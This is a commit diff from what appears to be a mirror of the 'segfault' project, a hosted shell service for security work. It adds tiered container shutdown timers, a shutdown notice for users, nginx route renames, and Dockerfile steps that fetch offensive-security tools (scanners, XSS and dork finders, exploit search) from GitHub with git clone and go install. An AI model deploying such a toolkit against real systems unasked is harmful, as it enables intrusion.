mirror of
https://github.com/hackerschoice/segfault.git
synced 2024-06-16 11:58:43 +00:00
guest docker bumping
This commit is contained in:
parent
fc10201e80
commit
44f0018fff
@ -1,7 +1,10 @@
|
|||||||
0.5.4 - 2023-02-00
|
0.5.4 - 2023-02-00
|
||||||
|
* OpenSSH 9.6p1
|
||||||
* rshell
|
* rshell
|
||||||
* sploitscan
|
* sploitscan
|
||||||
* OpenVPN (curl sf/vpn)
|
* OpenVPN (curl sf/ovpn)
|
||||||
|
* Different auto-shutdown timers for FREE and TOKEN users
|
||||||
|
* Syscop login message after auto-shutdown
|
||||||
|
|
||||||
0.5.2 - 2023-12-00
|
0.5.2 - 2023-12-00
|
||||||
* Kali 2023.4
|
* Kali 2023.4
|
||||||
|
4
Makefile
4
Makefile
@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
|
|||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
|
||||||
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
|
||||||
|
|
||||||
@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
|
|||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
|
||||||
|
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
|
||||||
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
|
|||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/sf"
|
FILES_ROOT += "segfault-$(VER)/sfbin/sf"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
|
||||||
|
@ -69,13 +69,15 @@ http {
|
|||||||
gzip off;
|
gzip off;
|
||||||
|
|
||||||
location / {
|
location / {
|
||||||
try_files $uri $uri/ = 404;
|
#try_files $uri $uri/ = 404;
|
||||||
rewrite /net /net/;
|
rewrite ^/net$ /net/ last;
|
||||||
rewrite /vpn /vpn/;
|
rewrite ^/ovpn$ /ovpn/ last;
|
||||||
rewrite /wg /wg/;
|
rewrite ^/vpn$ /ovpn/ last;
|
||||||
rewrite /dmesg /dmesg/;
|
rewrite ^/wg$ /wg/ last;
|
||||||
rewrite /port /port/;
|
rewrite ^/dmesg$ /dmesg/ last;
|
||||||
rewrite /set /set/;
|
rewrite ^/port$ /port/ last;
|
||||||
|
rewrite ^/set$ /set/ last;
|
||||||
|
rewrite ^/vpn/(.*)$ /ovpn/$1 last;
|
||||||
|
|
||||||
location ~* ^/set/.* {
|
location ~* ^/set/.* {
|
||||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||||
@ -101,11 +103,11 @@ http {
|
|||||||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||||
}
|
}
|
||||||
location ~* ^/vpn/.* {
|
location ~* ^/ovpn/.* {
|
||||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||||
fastcgi_param REQUEST_URI $request_uri;
|
fastcgi_param REQUEST_URI $request_uri;
|
||||||
fastcgi_param REQUEST_BODY $request_body;
|
fastcgi_param REQUEST_BODY $request_body;
|
||||||
fastcgi_param FCGI_CMD vpn;
|
fastcgi_param FCGI_CMD ovpn;
|
||||||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||||
}
|
}
|
||||||
|
6
config/etc/sf/timers.conf
Normal file
6
config/etc/sf/timers.conf
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||||
|
#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||||
|
#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||||
|
#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||||
|
|
||||||
|
|
@ -40,7 +40,7 @@ services:
|
|||||||
devices:
|
devices:
|
||||||
- "/dev/fuse:/dev/fuse"
|
- "/dev/fuse:/dev/fuse"
|
||||||
volumes:
|
volumes:
|
||||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
- "${SF_BASEDIR:-.}/config/db:/config/db:rw"
|
||||||
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||||
@ -76,6 +76,7 @@ services:
|
|||||||
- "/dev/fuse:/dev/fuse"
|
- "/dev/fuse:/dev/fuse"
|
||||||
volumes:
|
volumes:
|
||||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
||||||
|
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||||
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
|
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
|
||||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||||
|
@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
|
|||||||
encfs \
|
encfs \
|
||||||
redis \
|
redis \
|
||||||
xfsprogs-extra
|
xfsprogs-extra
|
||||||
COPY destructor.sh encfsd.sh portd.sh /
|
COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /
|
||||||
|
@ -3,149 +3,28 @@
|
|||||||
# shellcheck disable=SC1091 # Do not follow
|
# shellcheck disable=SC1091 # Do not follow
|
||||||
source /sf/bin/funcs.sh
|
source /sf/bin/funcs.sh
|
||||||
source /sf/bin/funcs_redis.sh
|
source /sf/bin/funcs_redis.sh
|
||||||
|
|
||||||
SF_TIMEOUT_WITH_SHELL=604800
|
# Defaults
|
||||||
SF_TIMEOUT_NO_SHELL=129600
|
SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||||
|
SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||||
|
SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||||
|
SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||||
[[ -n $SF_DEBUG ]] && {
|
[[ -n $SF_DEBUG ]] && {
|
||||||
SF_TIMEOUT_WITH_SHELL=180
|
SF_TIMEOUT_WITH_SHELL=60
|
||||||
SF_TIMEOUT_NO_SHELL=120
|
SF_TIMEOUT_NO_SHELL=15
|
||||||
}
|
SF_TIMEOUT_TOKEN_WITH_SHELL=120
|
||||||
|
SF_TIMEOUT_TOKEN_NO_SHELL=90
|
||||||
# [LID] <1=encfs> <1=Container> <message>
|
|
||||||
# Either parameter can be "" to not stop encfs or lg-container
|
|
||||||
stop_lg()
|
|
||||||
{
|
|
||||||
local is_encfs
|
|
||||||
local is_container
|
|
||||||
local lid
|
|
||||||
local ts_born
|
|
||||||
lid="$1"
|
|
||||||
ts_born="$2"
|
|
||||||
is_encfs="$3"
|
|
||||||
is_container="$4"
|
|
||||||
|
|
||||||
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
|
||||||
|
|
||||||
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
|
||||||
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
|
||||||
rm -f "/sf/run/pids/lg-${lid}.pid"
|
|
||||||
rm -f "/sf/run/ips/lg-${lid}.ip"
|
|
||||||
rm -rf "/config/self-for-guest/lg-${lid}"
|
|
||||||
rm -rf "/sf/run/users/lg-${lid}"
|
|
||||||
|
|
||||||
# Kill the OpenVPN process (if running)
|
|
||||||
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
|
||||||
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
|
||||||
|
|
||||||
# Tear down container
|
|
||||||
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
|
||||||
|
|
||||||
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
|
||||||
# inside the container even that we never moved it into the container's
|
|
||||||
# Process Namespace. EncFS will also die when the lg- is shut down.
|
|
||||||
# This is only neede for cgroup1:
|
|
||||||
[[ -n $is_encfs ]] && {
|
|
||||||
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
|
||||||
# Give kernel time to unmount mountpoint
|
|
||||||
sleep 1
|
|
||||||
}
|
|
||||||
# Do not use 'rm -rf' here as this might still be a mounted drive
|
|
||||||
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
|
||||||
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
|
||||||
rmdir "/encfs/sec/lg-${lid}"
|
|
||||||
}
|
|
||||||
|
|
||||||
# [lg-$LID]
|
|
||||||
# Check if lg- is running and
|
|
||||||
# 1. EncFS died
|
|
||||||
# 2. Container should be stopped (stale, idle)
|
|
||||||
check_container()
|
|
||||||
{
|
|
||||||
local c
|
|
||||||
local lid
|
|
||||||
local i
|
|
||||||
local IFS
|
|
||||||
local fn
|
|
||||||
local comm
|
|
||||||
local ts_logout
|
|
||||||
local ts_born
|
|
||||||
IFS=$'\n'
|
|
||||||
|
|
||||||
c="$1"
|
|
||||||
lid="${c#lg-}"
|
|
||||||
|
|
||||||
[[ ${#lid} -ne 10 ]] && return
|
|
||||||
|
|
||||||
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
|
||||||
# Skip if EncFS only started recently (zsh not yet started).
|
|
||||||
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
|
||||||
|
|
||||||
# Check if EncFS is still running.
|
|
||||||
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
|
||||||
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
|
||||||
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
# ts_logout may not exist (stale)
|
|
||||||
ts_logout=0
|
|
||||||
fn="/config/db/user/lg-${lid}/ts_logout"
|
|
||||||
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
|
||||||
|
|
||||||
# Check if there is still a shell running inside the container:
|
|
||||||
IFS=""
|
|
||||||
set -o pipefail
|
|
||||||
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
|
||||||
# HERE: lg died or top failed.
|
|
||||||
set +o pipefail
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
set +o pipefail
|
|
||||||
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
|
||||||
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
|
||||||
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
|
||||||
|
|
||||||
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
|
||||||
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
|
||||||
|
|
||||||
# HERE: LG & EncFS are running.
|
|
||||||
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
|
||||||
# HERE: User still has shell running
|
|
||||||
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
|
||||||
[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
|
|
||||||
# HERE: Not logged in. logged out more than 1 week ago.
|
|
||||||
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
# HERE: No shell running, ts_logout=0 if never logged out
|
|
||||||
|
|
||||||
# Skip if only recently logged out.
|
|
||||||
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
|
||||||
|
|
||||||
# Filter out stale processes
|
|
||||||
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
|
||||||
# HERE: Nothing running but stale processes
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
# HERE: Something running (but no shell, and no known processes)
|
|
||||||
|
|
||||||
[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
|
|
||||||
# User logged out 1.5 days ago. No shell. No known processes.
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
|
||||||
}
|
}
|
||||||
|
|
||||||
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
|
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
|
||||||
|
source /funcs_destructor.sh || ERREXIT 255
|
||||||
|
|
||||||
export REDISCLI_AUTH="${SF_REDIS_AUTH}"
|
export REDISCLI_AUTH="${SF_REDIS_AUTH}"
|
||||||
|
|
||||||
while :; do
|
while :; do
|
||||||
sleep 30
|
sleep 30
|
||||||
|
source /config/etc/sf/timers.conf 2>/dev/null
|
||||||
|
source /funcs_destructor.sh 2>/dev/null
|
||||||
NOW=$(date +%s)
|
NOW=$(date +%s)
|
||||||
# Every 30 seconds check all container we are tracking (from encfsd)
|
# Every 30 seconds check all container we are tracking (from encfsd)
|
||||||
containers=($(cd /sf/run/encfsd/user && echo lg-*))
|
containers=($(cd /sf/run/encfsd/user && echo lg-*))
|
||||||
|
153
encfsd/funcs_destructor.sh
Executable file
153
encfsd/funcs_destructor.sh
Executable file
@ -0,0 +1,153 @@
|
|||||||
|
|
||||||
|
# [LID] <1=encfs> <1=Container> <message>
|
||||||
|
# Either parameter can be "" to not stop encfs or lg-container
|
||||||
|
stop_lg()
|
||||||
|
{
|
||||||
|
local is_encfs
|
||||||
|
local is_container
|
||||||
|
local lid
|
||||||
|
local ts_born
|
||||||
|
lid="$1"
|
||||||
|
ts_born="$2"
|
||||||
|
is_encfs="$3"
|
||||||
|
is_container="$4"
|
||||||
|
|
||||||
|
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
||||||
|
|
||||||
|
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
||||||
|
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
||||||
|
rm -f "/sf/run/pids/lg-${lid}.pid"
|
||||||
|
rm -f "/sf/run/ips/lg-${lid}.ip"
|
||||||
|
rm -rf "/config/self-for-guest/lg-${lid}"
|
||||||
|
rm -rf "/sf/run/users/lg-${lid}"
|
||||||
|
|
||||||
|
# Kill the OpenVPN process (if running)
|
||||||
|
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
||||||
|
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
||||||
|
|
||||||
|
# Tear down container
|
||||||
|
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
||||||
|
|
||||||
|
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
||||||
|
# inside the container even that we never moved it into the container's
|
||||||
|
# Process Namespace. EncFS will also die when the lg- is shut down.
|
||||||
|
# This is only neede for cgroup1:
|
||||||
|
[[ -n $is_encfs ]] && {
|
||||||
|
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
||||||
|
# Give kernel time to unmount mountpoint
|
||||||
|
sleep 1
|
||||||
|
}
|
||||||
|
# Do not use 'rm -rf' here as this might still be a mounted drive
|
||||||
|
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
||||||
|
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
||||||
|
rmdir "/encfs/sec/lg-${lid}"
|
||||||
|
}
|
||||||
|
|
||||||
|
try_syscop_msg() {
|
||||||
|
local lid="$1"
|
||||||
|
echo -en "\
|
||||||
|
🤷♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
|
||||||
|
🫵 Please type ${CDC}halt${CDM} to stop your server or...
|
||||||
|
❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
|
||||||
|
|
||||||
|
🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
|
||||||
|
">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
|
||||||
|
}
|
||||||
|
|
||||||
|
# [lg-$LID]
|
||||||
|
# Check if lg- is running and
|
||||||
|
# 1. EncFS died
|
||||||
|
# 2. Container should be stopped (stale, idle)
|
||||||
|
check_container()
|
||||||
|
{
|
||||||
|
local c
|
||||||
|
local lid
|
||||||
|
local IFS=$'\n'
|
||||||
|
local fn
|
||||||
|
local comm
|
||||||
|
local ts_logout
|
||||||
|
local ts_born
|
||||||
|
local to_with_shell=$SF_TIMEOUT_WITH_SHELL
|
||||||
|
local to_no_shell=$SF_TIMEOUT_NO_SHELL
|
||||||
|
local is_token
|
||||||
|
|
||||||
|
c="$1"
|
||||||
|
lid="${c#lg-}"
|
||||||
|
|
||||||
|
[[ ${#lid} -ne 10 ]] && return
|
||||||
|
|
||||||
|
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
||||||
|
# Skip if EncFS only started recently (zsh not yet started).
|
||||||
|
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
||||||
|
|
||||||
|
# Check if EncFS is still running.
|
||||||
|
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
||||||
|
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
||||||
|
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
# ts_logout may not exist (stale)
|
||||||
|
ts_logout=0
|
||||||
|
fn="/config/db/user/lg-${lid}/ts_logout"
|
||||||
|
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
||||||
|
|
||||||
|
# Check if there is still a shell running inside the container:
|
||||||
|
IFS=""
|
||||||
|
set -o pipefail
|
||||||
|
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
||||||
|
# HERE: lg died or top failed.
|
||||||
|
set +o pipefail
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
# Load timers
|
||||||
|
[[ -e "/config/db/user/lg-${lid}/token" ]] && {
|
||||||
|
to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
|
||||||
|
to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
|
||||||
|
is_token=1
|
||||||
|
}
|
||||||
|
set +o pipefail
|
||||||
|
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
||||||
|
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
||||||
|
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
||||||
|
|
||||||
|
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||||
|
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
||||||
|
|
||||||
|
# HERE: LG & EncFS are running.
|
||||||
|
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
||||||
|
# HERE: User still has shell running
|
||||||
|
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||||
|
[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
|
||||||
|
# HERE: Not logged in. logged out more than 1 week ago.
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
||||||
|
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||||
|
|
||||||
|
return
|
||||||
|
}
|
||||||
|
# HERE: No shell running, ts_logout=0 if never logged out
|
||||||
|
|
||||||
|
# Skip if only recently logged out.
|
||||||
|
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
||||||
|
|
||||||
|
# Filter out stale processes
|
||||||
|
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
||||||
|
# HERE: Nothing running but stale processes
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
||||||
|
return
|
||||||
|
}
|
||||||
|
# HERE: Something running (but no shell, and no known processes)
|
||||||
|
|
||||||
|
[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
|
||||||
|
# User logged out 1.5 days ago. No shell. No known processes.
|
||||||
|
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
|
||||||
|
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||||
|
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
||||||
|
}
|
@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||||||
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
|
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
|
||||||
&& mkdir -p /usr/share/gf \
|
&& mkdir -p /usr/share/gf \
|
||||||
&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \
|
&& git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
|
||||||
&& mv /tmp/gf/examples/*.json /usr/share/gf \
|
&& mv /tmp/gf/examples/*.json /usr/share/gf \
|
||||||
&& mv /tmp/gf/gf-completion.* /usr/share/gf \
|
&& mv /tmp/gf/gf-completion.* /usr/share/gf \
|
||||||
&& rm -rf /tmp/gf \
|
&& rm -rf /tmp/gf \
|
||||||
&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \
|
&& git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
|
||||||
&& mv /tmp/gf/*.json /usr/share/gf; }' \
|
&& mv /tmp/gf/*.json /usr/share/gf; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
|
||||||
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||||||
&& cmake . \
|
&& cmake . \
|
||||||
&& make \
|
&& make \
|
||||||
&& cp urldedupe /usr/bin; }' \
|
&& cp urldedupe /usr/bin; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \
|
&& /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
|
||||||
|
&& rm -rf /opt/username-anarchy/.git*; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
|
||||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
|
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
|
||||||
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux'
|
|||||||
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
|
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
|
||||||
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
|
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
|
||||||
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
|
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
|
||||||
